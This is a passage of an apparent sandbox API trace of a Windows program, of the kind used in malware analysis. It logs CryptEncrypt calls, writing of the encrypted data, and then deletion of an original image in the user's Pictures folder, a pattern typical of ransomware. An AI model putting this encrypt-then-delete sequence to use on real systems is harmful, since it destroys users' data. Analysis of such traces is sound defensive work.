dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab338, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.762] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x8889, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8890) returned 1 [0210.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.763] CharLowerBuffW (in: lpsz="byte[34960]", cchLength=0xb | out: lpsz="byte[34960]") returned 0xb [0210.763] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.764] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.764] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.764] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.764] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.764] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab410, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.764] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9ba68*, pdwDataLen=0x8cef60*=0x8889, dwBufLen=0x8890 | out: pbData=0x2a9ba68*, pdwDataLen=0x8cef60*=0x8890) returned 1 [0210.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.766] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.766] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.766] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.766] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.766] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.766] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.766] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.767] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.767] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.767] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.767] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.770] WriteFile (in: hFile=0x520, lpBuffer=0x2a8a938*, nNumberOfBytesToWrite=0x8890, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a938*, lpNumberOfBytesWritten=0x8cf5e4*=0x8890, lpOverlapped=0x0) returned 1 [0210.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.772] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0210.772] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.772] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0210.772] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.772] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.772] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.772] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.772] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.772] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.772] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaae58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.772] CryptDestroyKey (hKey=0x9e2078) returned 1 [0210.773] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.773] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.773] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.773] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.773] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.773] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.773] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.773] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.773] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.773] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.774] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.774] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.774] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.774] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.774] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.774] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.774] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.774] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.774] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.774] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.774] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.774] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.774] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.774] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.775] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.775] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.775] CryptReleaseContext (hProv=0xa7c990, dwFlags=0x0) returned 1 [0210.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.775] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.775] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.776] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.776] FreeLibrary (hLibModule=0x76390000) returned 1 [0210.776] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.776] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.776] CloseHandle (hObject=0x4dc) returned 1 [0210.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.778] CloseHandle (hObject=0x520) returned 1 [0210.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.780] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.780] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.780] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.780] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/LloJL.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\LloJL.jpg", lpFilePart=0x8cedf4*="LloJL.jpg") returned 0x22 [0210.780] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\LloJL.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\llojl.jpg")) returned 0x20 [0210.780] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\LloJL.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1708b0, ftCreationTime.dwHighDateTime=0x1d5d177, ftLastAccessTime.dwLowDateTime=0x84499200, ftLastAccessTime.dwHighDateTime=0x1d5cad0, ftLastWriteTime.dwLowDateTime=0x84499200, ftLastWriteTime.dwHighDateTime=0x1d5cad0, nFileSizeHigh=0x0, nFileSizeLow=0x8889, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="LloJL.jpg", cAlternateFileName="")) returned 0x9e1db8 [0210.780] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\LloJL.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\llojl.jpg")) returned 1 [0210.785] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1708b0, ftCreationTime.dwHighDateTime=0x1d5d177, ftLastAccessTime.dwLowDateTime=0x84499200, ftLastAccessTime.dwHighDateTime=0x1d5cad0, ftLastWriteTime.dwLowDateTime=0x84499200, ftLastWriteTime.dwHighDateTime=0x1d5cad0, nFileSizeHigh=0x0, nFileSizeLow=0x8889, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="LloJL.jpg", cAlternateFileName="")) returned 0 [0210.785] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0210.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.785] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.786] 